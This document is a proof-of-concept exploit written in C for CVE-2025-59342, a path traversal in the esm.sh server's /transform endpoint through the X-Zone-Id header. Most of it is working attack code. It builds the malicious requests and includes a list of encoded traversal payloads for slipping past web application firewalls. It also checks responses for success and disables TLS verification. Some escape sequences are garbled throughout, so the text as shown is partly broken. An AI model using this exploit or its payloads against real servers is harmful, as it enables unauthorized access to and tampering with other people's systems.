esm-dev 136 – Path Traversal
Proof of Concept (PoC)
poc.sh
# Exploit Title: esm-dev 136 - Path Traversal
# Date: 2025-07-11
# Exploit Author: Byte Reaper
#Vendor Homepage: https://github.com/esm-dev/esm.sh
# Software Link: https://github.com/esm-dev/esm.sh
# CVE-2025-59342
- File : exploit.c
- Date : 09/17/2025
- Target : esm-dev
- Version: 136
- Target Endpoint : /transform
- Target Header : X-Zone-Id
- Vuln :
- Run exploit :
# gcc exploit.c argparse.c -o CVE-2025-59342 -lcurl
# ./CVE-2025-59342
#include <curl/curl.h>
#include <string.h>
#include <stdlib.h>
#include "argparse.h"
#include <time.h>
#include <unistd.h>
#include <sys/utsname.h>
#define FULL_URL 2500
#define P_Y 2000
#define POST_DATA 9000
int flagPort = 0;
int port = 80;
int selectPort = -1;
int verbose = 0;
int code = 1;
int found = 1;
int cF = 0;
int s = 0;
int bY = 0;
int sP = 0;
const char* cookies = NULL;
const char* payload = NULL;
void exit64bit()
{
int n = 0;
__asm__ volatile
(
"mov $0x4A, %%raxnt"
"mov $0x1, %%rdint"
"syscallnt"
"test %%rax, %%raxnt"
"jz .aDnt"
"mov $0x0, %[var]nt"
"jmp .finishnt"
".aD:nt"
"mov $0x1, %[var]nt"
".finish:nt"
: [var] "+r" (n)
:
: "rax",
"rdi"
);
if (n == 0)
{
printf("e[0;31m[-] sys_fsync syscall Faild.n");
fflush(stdout);
}
else if (n == 1)
{
printf("[+] sys_fsync syscall Success.n");
}
__asm__ volatile
(
"mov $0x0, %%rdint"
"mov $0x3C, %%raxnt"
"syscallnt"
:
:
: "rax",
"rdi"
);
}
struct Mem
{
char* buffer;
size_t len;
};
size_t write_cb(void* ptr, size_t size, size_t nmemb, void* userdata)
{
size_t total = size * nmemb;
struct Mem* m = (struct Mem*)userdata;
char* tmp = realloc(m->buffer, m->len + total + 1);
if (!tmp) return 0;
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '�';
return total;
}
int checkLen(int len, char* buf, size_t bufcap)
{
if (len < 0 || (size_t)len >= bufcap)
{
printf("e[0;31m[-] Len is Long ! e[0mn");
printf("e[0;31m[-] Len %de[0mn", len);
return 1;
}
else
{
printf("e[0;34m[+] Len Is Not Long.e[0mn");
return 0;
}
return 0;
}
const char* payloads[] =
{
"..//..//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa//",
"..../..../m.o.d.u.les/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/",
"..\/..\/modules\/transform\/c245626ef6ca0fd9ee37759c5fac606c6ec99daa\/",
".//.//m?odu?le?s/tran.sfo.rm/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/",
"..%252f%252f..%252f%252fmodules%252f%252ftransform%252f%252fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%252f",
"%252e%252e%252f%252f%252e%252e%252f%252fmodules%252f%252ftransform%252f%252fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%252f",
"..%2f%2f..modules%2f%2ftransform%2f%2fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%2f",
"%2e%2e%2f%2f%2e%2emodules%2f%2ftransform%2f%2fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%2f",
"..%255c%255c..%255c%255cmodules%255c%255ctransform%255c%255cc245626ef6ca0fd9ee37759c5fac606c6ec99daa%255c%255c",
"%252e%252e%255c%255c%252e%252e%255c%255cmodules%255c%255ctransform%255c%255cc245626ef6ca0fd9ee37759c5fac606c6ec99daa%255c%255c",
"%u002e%u002e%u2215%u2215%u002e%u002e%u2215%u2215modules%u002e%u002etransform%u002e%u002ec245626ef6ca0fd9ee37759c5fac606c6ec99daa%u002e",
"%u002e%u002e%u2216%u2216%u002e%u002e%u2216%u2216modules%u2216%u2216transform%u2216%u2216c245626ef6ca0fd9ee37759c5fac606c6ec99daa%u2216",
"%e0%40%ae%e0%40%ae%e0%80%af%e0%80%af%e0%40%ae%e0%40%ae%e0%80%af%e0%80%afmodules%e0%80%af%e0%80%aftransform%e0%80%af%e0%80%afc245626ef6ca0fd9ee37759c5fac606c6ec99daa%e0%80%af",
".%00.//.%00.//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa/",
"..;//..;//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa/",
"%c0%2e%c0%2e%c0%af%c0%af%c0%2e%c0%2e%c0%af%c0%afmodules%c0%af%c0%aftransform%c0%af%c0%afc245626ef6ca0fd9ee37759c5fac606c6ec99daa%c0%af",
NULL
};
static void request(const char *baseurl)
{
CURL* curl = curl_easy_init();
const char *mes3 = "e[0;34m[+] Create Object CURL Success.n";
const char *mes4 = "e[0;31m[-] Error Create Object CURL !e[0mn";
size_t len3 = strlen(mes3);
size_t len4 = strlen(mes4);
__asm__ volatile
(
"cmp $0x0, %[curlO]nt"
"je .donVnt"
".erD:nt"
"mov $0x1, %%raxnt"
"mov $0x1, %%rdint"
"mov %[msg], %%rsint"
"mov %[len], %%rdxnt"
"syscallnt"
"jmp .finishCnt"
".donV:nt"
"mov $0x1, %%raxnt"
"mov $0x1, %%rdint"
"mov %[msg1], %%rsint"
"mov %[len1], %%rdxnt"
"syscallnt"
"xor %%rdi, %%rdint"
"mov $0x3C, %%raxnt"
"syscallnt"
".finishC:nt"
:
: [curlO] "r" (curl),
[msg] "r" ((const char *)mes3),
[len] "r" ((long)len3),
[msg1] "r" ((const char*)mes4),
[len1] "r" ((long)len4)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
struct Mem response;
CURLcode res;
response.buffer = NULL;
response.len = 0;
const char* mes5 = "e[0;34m[+] Buffer Clean Success.e[0mn";
size_t len5 = strlen(mes5);
__asm__ volatile (
"test %[buffer], %[buffer]nt"
"jz L_print_cleannt"
"L_continue:nt"
"jmp L_donent"
"L_print_clean:nt"
"mov $0x1, %%raxnt"
"mov $0x1, %%rdint"
"movq %[msg13], %%rsint"
"mov %[len13], %%rdxnt"
"syscallnt"
"L_done:nt"
:
: [buffer] "r" ((const char*)response.buffer),
[msg13] "r" (mes5),
[len13] "r" (len5)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
char full[FULL_URL];
if (flagPort != 0)
{
const char* mes8 = "e[0;31m[-] Select Port is NULL !e[0mn";
size_t len8 = strlen(mes8);
__asm__ volatile (
"test %[var22], %[var22]nt"
"jnz L_finishnt"
"mov $1, %%raxnt"
"mov $1, %%rdint"
"mov %[msg13], %%rsint"
"mov %[len13], %%rdxnt"
"syscallnt"
"xor %%rdi, %%rdint"
"mov $0x3C, %%raxnt"
"syscallnt"
"L_finish:nt"
:
: [var22] "r" (selectPort),
[msg13] "r" (mes8),
[len13] "r" (len8)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
printf("e[0;34m[+] Port Select : %de[0mn",
selectPort);
int len1 = snprintf(full,
FULL_URL,
"%s:%d/transform",
baseurl,selectPort);
if (checkLen(len1,
full,
FULL_URL) == 1)
{
fprintf(stderr,
"e[0;31m[-] Error write base url !e[0mn");
exit64bit();
}
printf("e[0;34m[+] Write base URL success.e[0mn");
}
else if (flagPort == 0)
{
printf("e[0;34m[+] Auto port : %de[0mn", port);
int len2 = snprintf(full,
FULL_URL,
"%s:%d/transform",
baseurl,
port);
if (checkLen(len2, full, FULL_URL) == 1)
{
fprintf(stderr,
"e[0;31m[-] Error write base url !e[0mn");
exit64bit();
}
printf("e[0;34m[+] Write base URL success.e[0mn");
}
printf("[+] Base URL : %sn", baseurl);
printf("[+] Result full url : %sn", full);
char post[POST_DATA];
int len9 = snprintf(post, POST_DATA, "{"filename":"cve.js","lang":"js","code":"console.log('Exploit!');","importMap":{"imports":{"react":"https://esm.sh/react","react-dom":"https://esm.sh/react-dom"}},"jsxImportSource":"react","target":"es2022","sourceMap":"external","minify":true}");
if (checkLen(len9, post, POST_DATA) == 1)
{
fprintf(stderr,
"[-] Error write post data !e[0mn");
exit64bit();
}
printf("e[0;34m[+] Write Post data Success.e[0mn");
printf("e[0;35m[+] Post data :===================================e[0mn");
printf("%sn", post);
printf("e[0;32m[+] Size : %de[0mn", POST_DATA);
printf("e[0;32m[+] Len : %zue[0mn", strlen(post));
printf("e[0;35m==================================================e[0mn");
curl_easy_setopt(curl,
CURLOPT_URL,
full);
curl_easy_setopt(curl,
CURLOPT_ACCEPT_ENCODING,
"");
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
if (cF)
{
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
cookies);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
cookies);
}
curl_easy_setopt(curl,
CURLOPT_POST,
1L);
curl_easy_setopt(curl,
CURLOPT_POSTFIELDS,
post);
curl_easy_setopt(curl,
CURLOPT_POSTFIELDSIZE,
(long)strlen(post));
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&response);
curl_easy_setopt(curl,
CURLOPT_CONNECTTIMEOUT,
5L);
struct timespec rqtp, rmtp;
rqtp.tv_sec = 1;
rqtp.tv_nsec = 500000000;
register long r10R asm("r10");
r10R = 0;
printf("e[0;33m[+] Sleep (%ld seconds) && (%ld nanoseconds)...e[0mn",
rqtp.tv_sec, rqtp.tv_nsec);
int ret;
__asm__ volatile
(
"syscall"
: "=a"(ret)
: "a"(0xE6),
"D"((long)0),
"S"((long)0),
"d"(&rqtp),
"r"(r10R)
: "rcx",
"r11",
"memory"
);
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
struct curl_slist* headers = NULL;
headers = curl_slist_append(headers,
"User-Agent: Den/8.7.1");
headers = curl_slist_append(headers,
"Accept: */*");
headers = curl_slist_append(headers,
"Connection: keep-alive");
headers = curl_slist_append(headers,
"Content-Type: application/json");
headers = curl_slist_append(headers,
"Referer: http://localhost:9999/");
if (s!=0)
{
printf("[+] Your Payload : %sn", payload);
printf("e[0;33m[+] Checking payload...n");
if (strstr(payload, "../") || strstr(payload, "..\"))
{
printf("e[0;36m[+] Detected path traversal "../" in payload.n");
}
else
{
printf("e[0;31m[-] No path traversal detected. Please provide a valid payload.n");
exit64bit();
}
if (strstr(payload, "/transform"))
{
printf("e[0;36m[+] Detected endpoint '/transform' in payload.n");
}
else
{
printf("e[0;31m[-] Endpoint '/transform' not detected in payload!n");
exit64bit();;
}
}
else
{
headers = curl_slist_append(headers,
"X-Zone-Id: ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/"); //auto payload
printf("[+] Auto payload ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/.n");
}
curl_easy_setopt(curl,
CURLOPT_HTTPHEADER,
headers);
if (verbose)
{
curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
}
res = curl_easy_perform(curl);
curl_slist_free_all(headers);
if (res == CURLE_OK)
{
printf("e[1;36m[+] Request sent successfullye[0mn");
long httpcode;
double timeT;
double timeR;
char* urlD = NULL;
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpcode);
curl_easy_getinfo(curl,
CURLINFO_TOTAL_TIME,
&timeT);
curl_easy_getinfo(curl,
CURLINFO_REDIRECT_TIME,
&timeR);
curl_easy_getinfo(curl,
CURLINFO_REDIRECT_URL,
&urlD);
printf("e[0;32m[+] Delayed response : %fe[0mn", timeT);
printf("e[0;34m[+] TIME REDIRECT: %.1fe[0mn", timeR);
if (urlD == NULL)
{
printf("e[0;36m[+] Not REDIRECT Found.e[0mn");
}
else
{
printf("e[0;34m[+] REDIRECT To : %se[0mn", urlD);
}
printf("e[0;32m[+] HTTP CODE : %ldn", httpcode);
if (response.buffer != NULL)
{
printf("e[0;35m=============================================== [RESPONSE] ===============================================e[0mn");
printf("%sn", response.buffer);
printf("e[0;32m[+] Size Pointer response : %de[0mn", sizeof(response.buffer));
printf("e[0;32m[+] Len : %zue[0mn", response.len);
printf("e[0;35m==========================================================================================================e[0mn");
}
else
{
printf("e[0;31m[-] Error show buffer : NULL response !n");
__asm__ volatile
(
"mov $0x0, %%rdint"
"mov $0xE7, %%raxnt"
"syscallnt"
:
:
:"rax",
"rdi"
);
}
printf("===========================================================================================================n");
if (httpcode >= 200 && httpcode < 300)
{
const char* words[] =
{
"Exploit!",
"cve.js",
"mjs",
"console",
"code",
"map",
"AAAA",
"IAAI",
"names",
NULL
};
printf("e[0;32m[+] Http code (200 - 300)e[0mn");
printf("e[0;33m[+] Check Word in response...e[0mn");
for (int u = 0; words[u] != NULL; u++)
{
code = 1;
if (strstr(response.buffer, words[u]) != NULL)
{
printf("[+] Word found in response : %sn",
words[u]);
__asm__ volatile
(
"mov $0x0, %[var12]nt"
: [var12] "=r" (found)
:
:
);
break;
}
}
if (found == 0)
{
printf("e[0;36m[+] Words were found in the server's response, indicating that the exploitation was likely successful.e[0mn");
}
const char *mes11 = "e[0;31m[-] Not found words in response !e[0mn";
size_t len11 = strlen(mes11);
__asm__ volatile
(
"test %[var11], %[var11]n"
"jnz notZeront"
"jmp finish11nt"
"notZero:nt"
"mov $0x1, %%raxnt"
"mov $0x1, %%rdint"
"movq %[size11], %%rsint"
"mov %[len11], %%rdxnt"
"syscallnt"
"finish11:nt"
:
: [var11] "r" ((int)found),
[size11] "r" ((const char *)mes11),
[len11] "r" (len11)
:"rax",
"rdi",
"rsi",
"rdx",
"r11",
"rcx",
"memory"
);
}
else
{
printf("e[0;31m[-] Http code Not range (200 - 300)e[0mn");
printf("e[0;31m[-] Please check url and port.e[0mn");
}
printf("e[0;35m[+] Result Exploit :e[0mn");
if (code == 1 && found == 0)
{
printf("e[0;36m[+] HTTP code positive and expected word found: Exploit succeeded (CVE-2025-59342).e[0mn");
}
else if (code == 1 && found != 0)
{
printf("e[0;36m[+] HTTP code positive but expected word not found: Partial success (CVE-2025-59342).e[0mn");
}
else if (code != 1 && found == 0)
{
printf("e[0;31m[-] HTTP code negative but word found: Unexpected result (CVE-2025-59342).e[0mn");
}
else
{
printf("e[0;31m[-] Exploitation did not succeed.e[0mn");
}
}
else
{
printf("e[0;31m[-] Error Send Request !e[0mn");
printf("e[0;31m[-] Error : %sn", curl_easy_strerror(res));
exit64bit();
}
curl_easy_cleanup(curl);
free(response.buffer);
}
void bypass(const char* urlB)
{
struct Mem responseBypass;
responseBypass.buffer = NULL;
responseBypass.len = 0;
const char* mes14 = "e[0;34m[+] Buffer Clean Success.e[0mn";
size_t len14 = strlen(mes14);
__asm__ volatile (
"test %[buffer1], %[buffer1]nt"
"jz L_print_clean1nt"
"L_continue1:nt"
"jmp L_done1nt"
"L_print_clean1:nt"
"mov $0x1, %%raxnt"
"mov $0x1, %%rdint"
"movq %[msg14], %%rsint"
"mov %[len14], %%rdxnt"
"syscallnt"
"L_done1:nt"
:
: [buffer1] "r" ((const char*)responseBypass.buffer),
[msg14] "r" (mes14),
[len14] "r" (len14)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
CURL* curl = curl_easy_init();
if (curl == NULL)
{
fprintf(stderr,"[-] Error Create Object CURL !n");
exit64bit();
}
CURLcode res1;
char postData[POST_DATA];
int len15 = snprintf(postData,
POST_DATA,
"{"filename":"cve.js","lang":"js","code":"console.log('Exploit!');","importMap":{"imports":{"react":"https://esm.sh/react","react-dom":"https://esm.sh/react-dom"}},"jsxImportSource":"react","target":"es2022","sourceMap":"external","minify":true}");
if (checkLen(len15,
postData,
POST_DATA) == 1)
{
fprintf(stderr,
"[-] Error write post data !e[0mn");
exit64bit();
}
if (curl)
{
for (int i = 0; payloads[i] != NULL; i++)
{
struct curl_slist* h = NULL;
char fullURL[FULL_URL];
snprintf(fullURL,
FULL_URL,
"%s/transform",
urlB);
char hLine[1024];
snprintf(hLine,
1024,
"X-Zone-Id: %s",
payloads[i]);
h = curl_slist_append(h, hLine);
h = curl_slist_append(h,
"User-Agent: Den/8.7.1");
h = curl_slist_append(h,
"Content-Type: application/json");
curl_easy_setopt(curl,
CURLOPT_URL,
fullURL);
curl_easy_setopt(curl,
CURLOPT_HTTPHEADER,
h);
if (cF)
{
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
cookies);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
cookies);
}
curl_easy_setopt(curl,
CURLOPT_POSTFIELDS,
postData);
curl_easy_setopt(curl,
CURLOPT_POSTFIELDSIZE,
(long)strlen(postData));
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&responseBypass);
struct timespec rqtp, rmtp;
rqtp.tv_sec = 1;
rqtp.tv_nsec = 500000000;
register long r10R asm("r10");
r10R = 0;
printf("e[0;33m[+] Sleep (%ld seconds) && (%ld nanoseconds)...e[0mn",
rqtp.tv_sec, rqtp.tv_nsec);
int ret;
__asm__ volatile
(
"syscall"
: "=a"(ret)
: "a"(0xE6),
"D"((long)0),
"S"((long)0),
"d"(&rqtp),
"r"(r10R)
: "rcx",
"r11",
"memory"
);
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
res1 = curl_easy_perform(curl);
curl_slist_free_all(h);
if (res1 == CURLE_OK)
{
long httpC;
printf("---------------------------------------------------------------------------------------------------n");
printf("e[1;36m[+] Request sent successfullye[0mn");
printf("[+] Payload Test : %sn", payloads[i]);
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpC);
printf("[+] Http code : %ldn",
httpC);
if (responseBypass.buffer != NULL)
{
printf("e[0;35m=============================================== [RESPONSE] ===============================================e[0mn");
printf("%sn", responseBypass.buffer);
printf("e[0;35m==========================================================================================================e[0mn");
if (httpC == 501 || strstr(responseBypass.buffer,
"Unsupported method") != NULL)
{
printf("[-] Please check target URL, The server does not support the POST request.n");
}
else
{
__asm__ volatile("nop");
}
}
else
{
printf("[-] Response NULL !n");
exit64bit();
}
if (httpC >= 200 && httpC < 300)
{
if (code == 0)
{
printf("[+] Bypass Waf Success.n");
}
else
{
printf("[-] The server's response is still negative !n");
}
if (responseBypass.buffer != NULL)
{
printf("e[0;35m=============================================== [RESPONSE] ===============================================e[0mn");
printf("%sn", responseBypass.buffer);
printf("%zun", responseBypass.len);
printf("e[0;35m==========================================================================================================e[0mn");
free(responseBypass.buffer);
responseBypass.buffer = NULL;
responseBypass.len = 0;
}
else
{
printf("[-] Response NULL (Bypass WAF) !n");
exit64bit();
}
}
else
{
printf("[-] Http code Not 200-300 !n");
printf("[+] Waf detect OR check input base url / port.n");
}
}
}
}
else
{
printf("[-] Error Send Request !n");
}
curl_easy_cleanup(curl);
}
int main(int argc,
const char** argv)
{
printf("e[1;37m+-----------------------+e[0mn");
printf("e[1;37m| Author : Byte Reaper |e[0mn");
printf("e[1;37m| CVE : CVE-2025-59342 |e[0mn");
printf("e[1;37m| Vuln : Path Traversal |e[0mn");
printf("e[1;37m+-----------------------+e[0mn");
printf("e[1;30m------------------------------------------------------------------------e[0mn");
printf("[+] Check Your os...n");
struct utsname os;
__asm__ volatile
(
"mov %0, %%rdint"
"mov $0x3F, %%raxnt"
"syscallnt"
:
: "r"(&os)
: "rax",
"rdi"
);
printf("e[0;36m[+] System Name: %se[0mn", os.sysname);
printf("e[0;36m[+] Machine : %se[0mn", os.machine);
if (strstr(os.sysname, "Linux") != NULL)
{
printf("e[0;36m[+] Linux OS, Check Machine architecture...e[0mn");
}
else
{
printf("[-] OS Not Linux 64 bit (%s),Exit...e[0mn", os.sysname);
printf("[+] Please RUN exploit in linux.n");
exit64bit();
}
if (strstr(os.machine, "x86_64") != NULL)
{
printf("e[0;36m[+] Machine architecture is 64 bit, run exploit...e[0mn");
}
else
{
printf("[-] OS Not architecture 64 bit (%s), Exit...e[0mn", os.machine);
exit64bit();
}
const char* url = NULL;
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('u',
"url",
&url,
"Enter Target URL."),
OPT_INTEGER('p',
"port",
&selectPort,
"Enter Target PORT."),
OPT_BOOLEAN('v',
"verbose",
&verbose,
"Verbose Mode."),
OPT_STRING('c',
"cookies",
&cookies,
"Enter File cookies."),
OPT_STRING('k',
"payload",
&payload,
"Enter Payload."),
OPT_BOOLEAN('b',
"bypass",
&sP,
"Arg Bypass WAF."),
OPT_END()
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
if (!url)
{
printf("e[0;31m[-] Please Enter Target IP OR URl !e[0mn");
printf("e[0;31m[!] Exemple : ./CVE-2025-59342 -u http://TARGETe[0mn");
__asm__ volatile
(
"xor %%rdi, %%rdint"
"mov $0x3C, %%raxnt"
"1:nt"
"syscallnt"
:
:
: "rax",
"rdi",
"rsi"
);
}
if (verbose)
{
__asm__ volatile
(
"add $0x1, %[var6]nt"
: [var6] "+r" (verbose)
:
:
);
}
else
{
__asm__ volatile
(
"mov $0x0, %[var7]nt"
: [var7] "=r" (verbose)
:
:
);
}
flagPort = (selectPort != -1);
if (payload != NULL)
{
s = 1;
}
else
{
s = 0;
}
if (sP)
{
bypass(url);
}
else
{
request(url);
}
printf("e[0;36m[+] Finish Script.n");
__asm__ volatile
("mov $0x3C, %%raxnt"
"mov $0x0, %%rdint"
"syscallnt"
:
:
:"rax", "rdi"
);
}